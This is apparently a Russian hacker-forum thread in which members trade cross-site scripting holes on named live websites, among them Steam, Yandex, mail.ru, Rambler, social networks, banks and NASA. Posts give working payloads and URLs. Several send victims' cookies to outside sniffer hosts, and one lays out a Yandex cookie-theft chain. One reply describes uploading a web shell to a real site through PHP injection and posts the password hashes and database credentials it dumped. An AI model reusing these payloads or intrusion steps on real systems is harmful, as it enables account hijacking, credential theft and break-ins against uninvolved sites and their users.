https://cafe.steampowered.com/index.php?area=cafe/directory&country="><script>alert('XSS')</script>

дерзайте сайт всемирный фирмы каторая держить кс!
XSS нашол не я! ибо нашол на забугорных сайтах xss
Так же была найдена SQL иньекция (без поддомена cafe) к сожелению ее прикрыли но хакер выхватил то что надо.......

Спасибо за внимание!

(извените если не туда)

http://webmail.meta.ua/img/logo_t.gif Meta.ua

Активная XSS при открытии вложения, а именно злобного SWF-файла.
Работает в Mozilla Firefox.
Файл создавать так:
http://forum.antichat.ru/showthread.php?t=65360
Проверил в Opera 9.52- тоже работает.

goroskop.bigmir.net

Уязвимо поле "Имя" при составлении любого гороскопа, однако статическая страница с XSS-кодом выводится только в "Персональном гороскопе".
Пример:
http://goroskop.bigmir.net/personal/#stage=payment&pid=5065224&s=18414763

Gmail.com
Та же самая ситуация с ядовитой флешкой.
Работает в Opera 9.52 и в FF 3 (на второй ветке не проверял).

Rambler.ru
И опять 25. Баги с гороскопами повторяются, на сей раз под скальпелем- Рамблер(движок гороскопов тот же, что и на Бигмире).

"Персональный":
http://horoscopes.rambler.ru/personal/index.html#stage=payment&pid=89576&s=0590207

"Китайский 2008":
http://horoscopes.rambler.ru/chineseyear/#stage=payment&pid=89576&s=28749925

Ukr.net

Украинская электронная почта №1

При заливке видео не фильтруется параметр "Ник":
http://play.ukr.net/auth/profile/id/449817/

Удалили уже...
http://play.ukr.net/auth/profile/id/449882/

))
http://www.itah.com/?query=%3Cscript
%3Ealert%28%27xss%27%29%3C%2Fscript
%3E&itahsite=www.asiaep.com&userCode=J2ufVZpJNG9
A&sitesearch=www.asiaep.com&m=main&c=search_host&sa
=Search

Google.com

Вообщем есть такая замечательная штука как
Гаджеты гугла. Создаем в igoogle гаджет
и прописываем наш код cохраняем
(ссылочку на файл xml копируем )
создаем свой сайт там есть возможность вставить гаджет в страничку
в итоге

http://sites.google.com/site/xcedz0mbie/

прокатывает и в опере последней и в фф

одноклассники.ру

Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... :(

http://wg3.odnoklassniki.ru/dk?st.cmd=altGroupMain&st.groupId=43219581272223&tkn=1446

В продолжение темы о социальных сетях...
connect.ua

"Мои фото" -> создаем альбом.
Не фильтруются поля "Описание"(работает в списке альбомов) и "Название"(работает при входе в альбом, но тут надо приписать закрытый тег </title>).

http://connect.ua/myphotos-272106

"Аудио"- не фильтруются поля "Альбом" и "Исполнитель". Работает в "Моих записях" и на главной странице(!) профиля.

http://connect.ua/user-272106

Кто хочет поискать еще- дерзайте! Кто ищет, тот... выпьет обязательно! ;)

TUT.UA- молодой, но довольно крупный проект.

При регистрации называем себя именем:
"><script>alert()</script>

http://ligendo.photo.tut.ua/

+ в списке новых пользователей:
http://photo.tut.ua/

Кстати еще нашел пасивную XSS на TUT.UA http://photo.tut.ua/search/ - в строке поиска пишем "><script>alert()</script> ))) Ппц (Еси не вв тему просто хотел дополнить ХSS - iddqd ))

Хммм обьясните плиз я вот на сайте зарегался ну как бы свой снифер вставил! Мой логин kuzya так вот еси мну в поиске поискать ну набрав мой ник kuzya то ничего не находит и не какой Xss не вылазиет! А вот мну куки отсылаются!! Чот я не понял)))Обьясните!http://photo.tut.ua/search/?q=kuzya&w=0&type=all - ВОт!!Ниче нету же)

BanQui,
http://photo.tut.ua/search/?q='"/><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>&w=0&type=all

Antimir.com.ua - какбы социалка+знакомства ;)

При заполнении анкеты в основном блоке "О себе" не фильтруется поле "Я ищу"(нужно указать"Другое" и вставить свой кодес).

Блок "Интересы":
Ваши интересы=>и еще мне нравится=>кодес;
Чем Вы займетесь в свободное время=>а также=>кодес;
Занятия спортом=>другое=>кодес;
Стили музыки=>другое=>кодес.


http://antimir.com.ua/~ligendo

LiveInternet.ru

При заполнении анкеты не фильтруются поля "Имя", "Фамилия" и "Отчество".

http://www.liveinternet.ru/users/ligendo/profile/

steampowered.com

http://store.steampowered.com/news/?appids=%22%3E%3Cscript%3Ealert(%27XXS%20by%20dizn t%27)%3C/script%3E

http://store.steampowered.com/search/?genre=RPG&category1=%22%3E%3Cscript%3Ealert(%27XXS%20by%20di znt%27)%3C/script%3E

http://store.steampowered.com/news/?term="><script>alert('XSS by diznt')<%2Fscript>

XSS найдены мною лично... (думаю +++ поставите)

Х*й тебе на воротник а не + ...
Ты различие между пассивками и активками видишь?

Точно извените,
А нету спец раздела под пассивки?

ПС что такие не адекваты то?

Мне пох*й :)

mail.oboz.ua

Не фильтруется тело(!) письма, в отличии от темы... :confused:
Как в режиме текста, так и в html.

uaportal.com

"Дерево друзей"- заполняем информацию о себе. Ничего не фильтруется :)

http://drevo.uaportal.com/userinfo/ligendo

Просто смешно, написали свой форум с огромным кол-вом уязвимостей.
dropzone.by парашютный форум, - настоящие экстрималы)))
тут (http://www.dropzone.by/index.phtml?page=37011&l=r&sp=34&fid=1559)

planeta.rambler.ru

При просмотре профиля не фильтруется поле "Ник".


http://planeta.rambler.ru/users/nepoxek/
http://planeta.rambler.ru/users/nepoxek/profile/

http://i071.radikal.ru/0810/ed/d17ea7043adax.jpg

http://dom2.ru/

В комментарий можно вставить "><script>alert()</script>

http://dom2.ru/pulse/?id=28717&category=reports

p.s. Собчак лошадь =\

http://www.4shared.com
сервис для хранения файлов
Вариант 1
Заводим аккуант, далее заходим в панель управления и закачиваем файл ,
к примеру blabla.gif затем переименовываем его как {xssCode}.gif
Таким образом, если зайти на страничку со ссылкой на наш файл на этих сервисах, то
сработает наш "ядовитый" код.
Вариант 2
Отправляем личное сообщение юзеру с нашим {xssCode}. Для этого мы заходим на
ту страничку где есть ссылка на закачку файла.
При открытии в панели управления сообщения, отправленного нами, выполнится наш код.

используется на qip.ru :)

http://wow.ru/images/head_new_r1_c2.jpg

WOW.RU (http://wow.ru/db/index.php)

Оффициальный русский сервер варкрафта

вводим в поиск
</title><script>alert(document.cookie)</script>
=))

это не активка =\

http://wow.ru/images/head_new_r1_c2.jpg

WOW.RU (http://wow.ru/db/index.php)

Оффициальный русский сервер варкрафта

вводим в поиск

=))

тут тема для активных XSS, или ты разницу не рубишь? :(

тут тема для активных XSS, или ты разницу не рубишь? :(
Это вообще не XSS, даже не пассивная, потому что GET-запрос не канает.
Это xss пассивная)))
Если ты так рубишь,то должен знатть про xss post методом))

народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?

может меня кто обрадует?

народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?
там админка для всех желающих открыта http://www.asto.ru/admin/all.php :D :D :D

там админка для всех желающих открыта http://www.asto.ru/admin/all.php :D :D :D
_http://asto.ru/eng/admin/sotrud.php
пишем <?system(id)?>
и видим
uid=2196(astoru03) gid=2200(astoru03) groups=2200(astoru03), 2000(virthost)

// offtop

l1ght, foopi, зяблик
залил шелл..

смотрим..
info:pZLalPAr6jziQ:::::::
kucherov:P9Oa5.i.G3gQ.:::::::

$user="astoru03_asto";
$pass="qwerty";
$db="astoru03_withdriver";

foopi, l1ght, sabe Благодарю, чесно от души. Спасибо. За мной не заржавеет. Чем смогу тем помогу.

foopi, l1ght, sabe не сочтите конечно за наглость или необразованность скорее все вместе:) подскажите какую литературу надо учить. ? Есть желание, возможности и время. А с чего начать?

video.antichat.ru

video.antichat.ru
это все хорошо:) но команды языки ?, я вот в этом деле новенький, понимаешь вот как говорил, есть желание. Но а в подробностях, это все узнать как . Ксати там есть уже результат можете глянуть:))

для начала научись пользоваться мозгом и дуй в другой раздел, здесь идет обсуждение совсем других вопросов.

например можеш освоить sql inject
http://forum.antichat.ru/thread43966.html
http://forum.antichat.ru/thread19844.html

по возникшим вопросам сюда..
http://forum.antichat.ru/lastpostinthread46016.html

http://sacredangelro.com/svn/
в чате <script>alert(XSS)</script> в теме сообщения

liter.kz
zaycev.net
В обоих уязвимо поле поиска.
Код:
'><script>alert('xss')</script>

это не активка, это пассивка, смотрим внимательно

RAMBLER.RU

http://id-planet.rambler.ru/other/education/add

Добавляем учебное заведение, уязвимы поля "Название:" и "Факультет / Специализация:"

http://www.ecco-shoes.ru/rsm/gallery/

там слева поля для поиска - 5 штук.

Имя
Фамилия
Электронная почта

Город
Ключевое слово


Во всех XSS:)))))))))

"><script>alert('ГОЛО_СУЕМ')</script>

yandex.ru

http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yandex.ru%2Fyandsearch %3Fp%3D20%26text%3Dwhack%26rpt%3D%2522%253E%253Csc ript%253Ealert(document.cookie)%253C%2Fscript%253E %26login

yandex.ru

http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yandex.ru%2Fyandsearch %3Fp%3D20%26text%3Dwhack%26rpt%3D%2522%253E%253Csc ript%253Ealert(document.cookie)%253C%2Fscript%253E %26login

не работает :mad:

оперативно залатали :confused:

Яндекс.

На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются.
Что нам нужно сделать, чтобы поиметь чужие куки:

"Насильно" включить юзеру запись истории
Послать яндексу ядовитый поисковый запрос
Направить юзера на зараженную страницу истории запросов

Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
Кодес:

<html>
<body onload="location.href='http://nahodki.yandex.ru/';">
<img src="http://nahodki.yandex.ru/save_tunes.xml?store=1">
<img src="http://yandex.ru/yandsearch?clid=14585&text=тут_наш_злобнокодес">
</body>
</html>

(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).




<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Миракаль</title>
</head>
<frameset rows="30,30,30" cols="*">
<frame src="http://rambler.ru" name="rambler" scrolling="no" noresize>
<frame src="http://yandex.ru" name="yandex" scrolling="no" noresize>
<frame src="http://google.ru" name="google" scrolling="no" noresize>
</frameset>
</html>

otake.ru (http://otake.ru)

В "псто" вставляем какбэ картинку:
javascript:eval(String.fromCharCode.....)

только для риальне воене!!!1

пример:
http://www.zachetka.ru/forum/showthread.aspx?threadId=35295
хсска в логине.

http://www.schoolport.ru/

В форуме, при создании темы, уязвимы все поля...

В принципе он съедает любой джава код, так что писать что я туды закидывал не надо...

http://www.sgames.com.ua

В поле для ввода коментариев к статье:
<script>alert()</script>

http://www.sgames.com.ua

В поле для ввода коментариев к статье:
<script>alert()</script>
а ты уверен что это активная ?

не уверен... хм...

http://compfaculty.net.ua/misc/index.php?a=117

з.ы. абсолютно согласен с автором статьи, ибо учусь на этом же факультете

Бесплатные форумы aimoo.com
В профиле при редактировании подписи есть возможность вставить Ubb Code

javascript:alert(document.cookie);


http://ligendo.aimoo.com/General-Discussion/Welcome-to-Aimoo-Useful-Tips-you-need-to-know-1-172013.html

Социальная сеть privet.ru

PR:4
тИЦ:1800


В персональных сообщениях вставляем картинку с адресом javascript: и так далее....
воен знае, что делать!!1

Nightlife.ua

Крупный клубный портал.
Везде, где есть комментарии- уязвимы теги вставки изображения и гиперссылки. В личных сообщениях тоже.

http://nightlife.ua/gallery/cat/1088/photo/44496/
жмем на ссылку в коменте- и тут ололо пыщ пыщ алирт риальне!!11

UDAFF.COM

В профиле пользователя уязвимо поле ICQ

http://udaff.com/users/ligendo/

только для настоящих падонкаф!

http://www.alfabank.com.ua/search.php
и фазына ххс в поиске
http://www.pr-bank.ru/

blox.ua
Укр. блоги.
В теле поста голый js не проходит, но уязвимы многие теги(img, href etc).

paint.kards.qip.ru
Оставляем комент например к рисунку с нашим кодом.

при заходе на страничку автора рисунка срабытывает код.

http://www.voshod-avto.ru/catalogue.php?binn_rubrik_pl_catelems1=25609

активное поле: "По наименованию:"

P.S
на alert у меня не сработало на на iframe срабатывает

CMS: BinN S.Builder

http://saret-auto.ru/model/pilot/configurator/#forma

Уязвимы все поля кроме "Дополнительной информации:"
тоже сработал только iframe

vorum.ru - вопросы и ответы на любую тему
При заполнении профиля уязвимо поле "Имя". Но есть ограничение в 25 символов :(
http://vorum.ru/profile/show/ligendo

m@il.com

В теле письма уязвим тег <img>
Но злой фильтр превращает javascript:alert() в xjavascript:alert() :(

А вот когда жертва нажимает "Reply"- код срабатывает. :)
Так что в связке с СИ баг вполне рабочий. Проверено на Opera 9.63
IE- не сработало :mad:

http://www.articles.turne.com.ua/fotoreportazh-p-photo-716

Уязвимо поле Имя при добавлении коментария !

my.opera.com

В профиле пользователя, в графе "Web site" принимается JS. Для срабатывания необходимо нажать на ссылку.

http://my.opera.com/ligendo/about/

dbservermanager.com

Уязвимы поля : "Your Name" and "Testimonial"

http://dbservermanager.com/Testimonials.aspx

aromatshop.com

Уязвимы поля : "Имя:" and "Отзыв" во всех ID

http://aromatshop.com/?productID=22

Активная XSS в NeverLands.ru
Вообщем давно обнаружил, ну думаю выложу)
Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно!

Пример использования:

POST http://www.neverlands.ru/game.php HTTP/1.0
Accept: */*
Referer: http://www.neverlands.ru/index.cgi
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: <script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>
Host: www.neverlands.ru
Content-Length: 58
Pragma: no-cache
Cookie: watermark=МЕТКО

player_nick=ЛОГИН&player_password=ПАСС&x=1&y=1

Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим

ЛОГИН: HACKED_BY_TROJAN_http://s50.radikal.ru/i130/0901/82/ad5ae76cf1a4.gif

P.S. На момент публикации всё работает!

27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён")

TROJAN (с)

И вновь i.ua

Сервис "Объявления" - board.i.ua
При заполнении формы уязвимо поле "Название товара"

http://board.i.ua/user/1435442/

активная XSS на сайте Эльдорадо www.eldorado.ru (http://eldorado.com.ua/)
регистрируемся на форуме
уязвимо поле ИМЯ

A.UA
В письме уязвимо поле "Тема".

http://go.jetswap.com/support
Уязвимое поле тема.
Минус только один в течении примерно 10 часов служба поддержки обрабатывает ваш запрос и удаляет его.
З.Ы. У админов и службы поддержки скрипт не обрабатывается.

http://autoportal.od.ua/?a=forum&p=1
Уязвивмы все поля.

demotivation.ru
Уязвимо поле коментария
<IMG SRC="javascript:alert('XSS');">
http://demotivation.ru/0ixq1u1biut9pic.html
Пример

http://voiska.ru
уязвимое поле :название новости
http://voiska.ru/index.php?ind=news&op=news_show_category&idc=2

www.tiensmed.ru
уязвимое: название новости
http://www.tiensmed.ru/news/upcoming/

http://www.chef.com.ua
уязвимое поле:коментарии
http://www.chef.com.ua/articles/588.html#comments

http://www.mobime.ru/
уязвимое поле коментарии

http://sputnik.sg/rus/price/sg_tr.html

провайдер спутникового иннэта.
уязвимые поля:

Имя
mail
Comment

http://www.addtop.ru

http://www.addtop.ru/kom.php?id=32
уязвимое поле коментарии

www.3dtop.ru
уязвимое поле - коментарии
пример :
http://www.3dtop.ru/kom.php?id=23

http://www.domashnii.ru/blogs/
Уязвимо поле логин и ник при регистрации, затем постим комменты, например:
http://www.domashnii.ru/blogs/posts/view/72/

totalfootball.ru
Уязвимое поле "коментраии"
пример:
http://totalfootball.ru/day.php?id=231

http://dom2.ru
1. В редактировании пользователя в полях Фамилия, Имя, Город
2. При регистрации ника на странице инфо пользователя отображается в <title>
3. При отправке сообщений пользователям (при открытии письма) в поле тема

http://filesurf.ru/
файлообменник

заливаем файл filename.html с содержимым:
<script>alert(/xss/);</script>

http://indarnb.ru/
XSS в профиле
Уязвимы поля "Фамилия". "Имя" при регистрации.
Пример: http://indarnb.ru/users/?userId=3397B6FC83F4F1EA&cityId=1

магазин http://terabite.vn.ua
уязвимые поля Улица, Индекс, Страна, Телефон, Телефон 2, Факс, E-Mail при регистрации. так же имеются другие баги.

http://i.ua
Активный XSS в теле письма:
<img src="javascript:alert()">
Просто до безобразия, keep it priv8 ;)

http://i.ua
Активный XSS в теле письма:

Просто до безобразия, keep it priv8 ;)
там же во вкладке фото создаем альбом с названием: <script>alert("XSS")</script>. Жаль на маил.ру таких не осталось))

http://www.for.kg/ru/public_reporter/134/ . В коментарии вставляем "/><script>alert(/xss/)</script>

и получаем XSS

http://www.kazakh.ru/talk/mmess.phtml?idt=21316 Тут тоже самое, уязвимое поле коментария.

http://www.arsenal.com/ В поле поиска
http://www.arsenal.com/login в поле Username

http://testskills.ru/ - в полях ввода имя,фамилия,очество,емаил

это пассивка


активка, поле коммент ;)

http://stylemania.km.ru/Modelnoe_portfolio/comment

"/><script>alert(/xss/)</script>

активка в гостевой сайта Мульфильмы

http://www.multfilmy.ru/gesta/gesta.php
<img src="javascript:alert()">





Радио 20 (Активка)
http://station20.ru/track/923/
<img src="javascript:alert()">




Сайт Макса Фадеева (Активка )

http://www.fadeev.ru/gruppa-kitai-v-zhurnale-bravo#comments
"/><script>alert(/xss/)</script>






активка в поле имя и фамилия
http://www.kieves.com/index.shtml?titul=regist&dannye=1
"/><script>alert(/xss/)</script>

активка

http://www.migrants.ru/messages/?page=1
http://www.migrants.ru/forum/theme.php?

Ваще никакого фильтра нет, пролазит любой скрипт можно так сказать, да плюс еще сообщения дублируются трижды

http://www.bis.biysk.ru/index.phtml?/otzyv.phtml
Уязвимое поле: Тема.

активка

http://behappy.etoja.ru/Naii-ieoao-b1/-b1-p5551.htm#form_comment_id_5551
"/><script>alert(/xss/)</script>

WWW.ZAYCEV.NET
http://forum.zaycev.net/index.php?showuser=674679
Активка в подписи(FIXED)
P.S. в поиске пассивка осталась

Изволю себе запостить в этой теме Пассивную XSS на letitbit. Тему новую создавать не хочется, а сайт о огромный...

http://letitbit.net/tmpl/tmpl_frame_top.php?link="><script>alert()</script>

http://primkray.ru/sms/index.php
Active XSS in "Сообщение"

http://primkray.ru/bazar/zn_fl/index.php?a=form&id=
Active XSS in "Сообщение"

активки и пасивки на укр@мейл сервисах
http://uasc.org.ua/2009/09/ua-mail-xss/

http://www.nevesta-kino.ru/about/

в каждом поле

http://www.kaspersky.com/downloads/flash/productlaunch.swf?productLaunch=javascript:alert(1 2345)
Ну или просто редирект можно на нужную страницу сделать ))

rpgmaker.ru

javascript:alert();

forum.xakep.ru
Можно реализовать с помошью махинаций с тегами [url], [video], не раскручивал, кому интересно, могут добить сами.

http://www.teko.ca/board/topic.php?id=666
name=Guest&comments=<script>alert('ANTICHAT FOREVER')</script>&email=human

Народ, читайте первый пост!

Тут постим тока активные XSS.

Так же сайт на котором вы нашли xss должен быть более или менее популярным:

1. Он не должен быть расположен на бесплатном хостинге.

2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще.

Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы.

ресурс:
http://rutop.org

xss в поле коментарии:
http://rutop.org/kom.php?id=92

www.kino-tv.com.ua

http://www.kino-tv.com.ua/catalog.php?item=1828&filter=

Уязвимость - Оставьте комментарий
"><script>alert('ggg')<%2Fscript>

Ладно, блин, убью я в паблик эту XSS:

WebFile.Ru: при заливке файла в поле описания пишем код XSS.

Пример: http://webfile.ru/placed?id=4029293

http://smallbusiness.dp.ua/contacts/feedback

во всех полях xss кроме email

FILES.WYW.RY: При заливке файла в поле комментарии, а так-же при оставлении комvентария о файле
Пример:
Оставляем комментарий на странице http://files.wyw.ru/wyw_file?id=4061626 с содержимым <img src="http://media-task.ru/s/s.gif">

И смотрим сниффер http://media-task.ru/s

Нашел я, решил выкинуть в паблик)))

Ресурс:

https://files.webmoney.ru/


Изменяем имя папки на:

;"><script>alert()</script>

http://club.foto.ru/secondhand/offer.php?offer_id=28882#comment17439

http://album.foto.ru/photos/39179/

http://www.daler.ru
В коментах, в поле для ника.
<script>alert()<script>>
По мне так красивше выглядит
Пример: http://www.daler.ru/open/games/motorstorm/18597_5.html#c

http://torg.mail.ru/used/220783/?prev=1 открываем и.... =)

если не сразу открылась страница , то пару раз нажмите ентер )

cyberarena.tv
Регаем акк, заходим в него загружаем конфиг с таким содержанием: <script>alert()</script>
пример: _http://cyberarena.tv/profile.php?user=31337&task=getconfig

http://roses.tj/---->далее закладка " Guestbook "
уязвимое поле :
name :
email :
тест.сообщение

так же уязвимы комменты у фото!

http://torg.mail.ru/forum/113/?fid=13&tid=27455
теперь с чувством выполненого долга иду спать )

http://torg.mail.ru/forum/687/?fid=106&tid=27551
проснулся и продолжил ))

http://foto.meta.ua
http://audio.meta.ua
http://video.meta.ua

Пример:
http://foto.meta.ua/imgview.php?fid=2082370

Активная
При создании комментария

http://otvet.mail.ru/question/33499985/opros/

при создании вопроса

прощай любимая :(

http://groza.ru/articles/394

http://www.freehostsfinder.com/
в коментариях к любому хостингу, например
http://www.freehostsfinder.com/host-review/hosting_review.php?HostID=452
но на главной тоже работает, там снизу коменты последние выводятся
--
там пофиксили чего то, хз. фильтр какойто поставили

http://www.ctatc.ru/registration.php
Уязвимые поля Имя и Фамилия. XSS Выходит после активации аккаунта по e-mail'y.
+++
http://www.ctatc.ru/index.htm
Уязвимое поле Поисковая фраза
+++
www.snap.com
Поле Search
http://www.snap.com/classicsearch.php?pid=5d884d39449fd05ac20ea4827433 f22f&ip=178.93.198.166&query=%3Cscript%3Ealert%28%2F%D0%BE%D0%BD%D1%82%D0 %B5%D0%B4%D0%B0%D1%87%2F%29%3C%2Fscript%3E&submit_index.x=10&submit_index.y=16

Активка в данных юзера
http://buhgalter-info.ru/user/info/0012dceb3c910d5f0df52aeb60679535/

Не знаю точно в каком поле т.к. Искал активку с телефона + xss ввел сразу в все поля

p.s. сегодня посомтрел, активка в стране

http://stranamasterov.ru/user/register
Уязвимое поле: Откуда:

http://mankutianmolorak.com/main.php?page=poems&lang=rus

http://b2blogger.com/pressroom/register/
Уязвимые поля: Логин
+
пассивная в поиске


Яндекс тИЦ (CY)=850
Google PageRank (PR)=5

http://acm.mipt.ru/judge/ - МФТИ уязвимо полное имя + несложно найти пассивку

http://www.tourjournals.ru/user/register

Уязвимые поля:

1 .Настоящее имя и фамилия (по желанию)

2 .Немного о себе

3. Откуда Вы?

4. Домашняя страничка

http://present-games.ru/news/8/?offset=0#edit
уязвимое поле :
имя

Уважаемые модераторы сего раздела, вы зае*али удалять мои сообщения.

Активная XSS в теле письма на mail.ru: http://brainpillow.cc/bugtraq/mail.ru_active_xss_15.04.2010.txt
Активная XSS в теле письма на mail.com: http://brainpillow.cc/bugtraq/mail.com_active_xss_15.04.2010.txt
Активная XSS в теле письма на ukr.net: http://brainpillow.cc/bugtraq/ukr.net_active_xss_15.04.2010.txt
Активная XSS в теле письма на qip.ru: http://brainpillow.cc/bugtraq/qip.ru_active_xss_16.04.2010.txt

Посещаемость до 280к/день
ТИЦ:3100
http://www.e1.ru/auto/sale/485057.html
http://www.e1.ru/auto/truck/27138.html

Размещаем обявление:
в первом случае уязвимо поле VIN
во втором уязвимо поле ПРОДАВЕЦ

http://www.medicalstudents.in/
регаемся, Оставляем мессагу javascript:alert();

http://smspartner.biz/
http://partners.smsbz.ru/
http://partners.lika-x.ru/
уязвимое поле ник. редачить можно в профиле.
<script>alert()</script>

http://www.mail.az/

уязвимы все поля регистрации

Имя

Фамилия

Страна

Город

логин....


"><script>alert(document.cookie)</script>

"><script>alert('xss')</script>
-------------------------------------------------------
http://www.freenet.am

уязвимы все поля регистрации

Full name

Country, City

E-mail

Secret Question

"><script>alert(document.cookie)</script>

klgd.ru
при регистрации уязвимые поля: Имя и Логин
http://www.klgd.ru/reception/forum/index.php?PAGE_NAME=profile_view&UID=14134

Активка в теле
http://www.liveinternet.ru/im/inbox

"'></title><script>alert(document.cookie)</script>

Отправляем ответ на любое входящее сообщение и получаем активку в теле сообщения.

Активка в теле письма . Спасибо за помощь brain[pillow] профиль (https://forum.antichat.ru/member.php?u=67568)
www.e-mail.ru
<table style="border: ex/*dodo*/pression(alert(1))" background="&#x6A;avascript:alert(document.cookie)">

Активная XSS в теле письма на mail.kz: http://brainpillow.cc/bugtraq/mail.kz_active_xss_19.05.2010.txt

Отправляем Личные сообщения:
http://www.liveinternet.ru/im/letter/create

в теле сообщения:
<script>alert("found by life_glider");</script>

Может и неактуально уже .

http://xz.ucoz.ru/pam-pam.html

_www.zaks.ru/new/archive/view/69554?p=0&rv=1#discuss

Уязвим : E-Mail

"><script>alert(/XSS/)</script>

ТИЦ:500
PR:7
AlexaRank:1307

https://dl.dropbox.com/u/7832268/sample.html

holm.ru
В поле логин
"><script>alert('hugo')</script>

http://karpaty-slavsko.com.ua/guestbook.php
Поле Вопрос.
"><ScRiPt>alert('x')</ScRiPt>

http://www.javagames.su/search?swords=[XSS]&pg=1Запрос остается в "Что еще у нас искали"

украинская соц.сеть connect.ua

активная xss в описании фотографии

exploi

alert()

Какой то хостинг сайтов.

уязвимые поля в профиле: Имя и Фамилия.

пример.

http://www.che.ru/users/index.php?flt_personal_birthday_day=07-05

http://www.unsigned.com/

уязвимо поле названия аккаунта

http://www.mysql.ru/search/?b=1&terms=alert(123)

не активная правда, но мне просто нравится где)

http://www.aircon.ru/


При создании объявления в поле "текст объявления":



img = new Image(); img.src = "http://site.ru/sniff.gif?"+document.cookie;

CMS Legal


http://www.cmslegal.ru/ourpeople/pages/default.aspx

First Name иле Last Name:

[PHP]
[COLOR="#0000BB"][COLOR="#DD0000"]">alert(document.cookie)

http://www.quotationspage.com/search.php3?Search=&startsearch=Search

в Quotation или Author:

[PHP]
[COLOR="#0000BB"][COLOR="#DD0000"]">alert(document.cookie)alert(document.cookie)
[/CODE]


http://classicauthors.net/JumpTo.php?LinkID=30"alert(document.cookie)

http://sprashivai.ru

Заходим на страницу регистрации

В поле Имя пользователя вводим


alert('xss')

И воля!

megaline.kz - крупнейший казахстанский провайдер.

photo.megaline.kz - в форме регестрации вписываем


>alert('alert')

Любуемся =)

//зы нашёл ещё вчера, но тут зарегался только седьня.

http://universant.vov.ru/php4/love/anketa.phtml?id=3522

Уязвимое поле

Место работы

Добавьте другое место работы, если его еще нет в списке

http://universant.vov.ru/ вот сайт, ссылка "Регистрация"

И это и предыдущая ссылка проверены.

U.S Department of State

не активка =(( но сайт знаменитость..

http://travel.state.gov/search/search_4654.html

вписываем:


document.body.innerHTML ="body{ visibility:hidden; }

www.peoples.ru

Активная xss в названии темы на доске объявлений


Пример:
alert(1)
http://www.peoples.ru/in/board_messages.php

www.peoples.ru
Активная xss в названии темы на доске объявлений

Пример:
alert(1)
http://www.peoples.ru/in/board_messages.php



такая же фигня в ссылках, в теме и теле +


http://www.peoples.ru/search/?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

http://market.ya1.ru/

Активная XSS в тексте объявления


alert(1)

--

пассивки

http://www.almaz-antey.ru/news.php?srch=%3Cscript%3Ealert(1)%3C/script%3E


http://www.fototraveller.ru/news/news.php
>alert(1)

http://www.nne.ru/search.php?text=%3Cscript%3Ealert%281%29%3C%2Fscri pt%3E&imageField.x=12&imageField.y=12

http://www.vokrug.tv/search/?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

www.animecouncil.net

активная xss в комментариях к новости в поле " Your name "


пример
alert(1)
http://www.animecouncil.net/news.php?id=168

--

пассивки в поиске

http://www.arip.co.th/

http://fullrshare.com/

http://www.alexbriffett.com

Активная xss в поле "Your name"


пример
alert(1)
http://www.alexbriffett.com/image?id=11&t=image

--

пассивки в поиске

alert(1)

http://www.downarchive.com/

>alert(1)

http://ads.lzjl.com/newServing/yesupSearch/image.php

http://www.utworzspotkanie.pl/

http://www.enotatka.pl/

http://www.webgallery.za.pl/

по ходу одно и то же

Активная XSS в комментариях к фото


пример
alert(1)
http://www.utworzspotkanie.pl/photo.php?id=27

========================================

пассивки в китайском поиске

http://www.carnets.cn/

http://www.hr.gov.cn/

http://www.dangxiao.henan.gov.cn/

http://www.yugaopian.com/

http://www.dosug.cz/servlet/ru/recover

Вводим:


">alert(/xss/)


http://www.cadebou.pp.ru/ru/gb.php

http://www.laspodmoga.ru/gb.php

При ответе уязвимы все поля, кроме каптчи:


">alert(/xss/)

http://www.a1tv.ru/msearch/?&o=

вводим


">alert(/Xss by Jokerll/)

Выходит -

http://www.a1tv.ru/msearch/?&o=">alert(/Xss by Jokerll/)

nasa в паб. http://buzzroom.nasa.gov/

там где написано "What's Happening?" меняем на:

">alert(document.cookie)

mylove.ru активка в поле "интересы" в анкете ( а также в остальных полях там же). Не фильтруется вообще ничего, любой хтмл код лезет


Активка вида alert(/1/)

т.е. не закрываем тег (иначе будет видно в панели наверху)

Также, возможно, аналогичным образом уязвимы сайты-клоны lovegeek.ru и sex-znakomstva.tv

PostgreSQL Foundry

http://pgfoundry.org/account/register.php

уязвимы все поля регистрации

">alert()

тИЦ 170, PR-7

nnhost.ru

http://nnhost.ru/?p=5

все поля уязвимы

">alert()

ТИЦ 500

http://www.indarnb.ru/add-preview/

Уязвимы все поля

">alert(document.cookie)

20 000 хостов, ТиЦ 275


http://www.web-ip.ru/index.php?action=reg&r=1

Втавляем


">alert()

в поле E-mail.

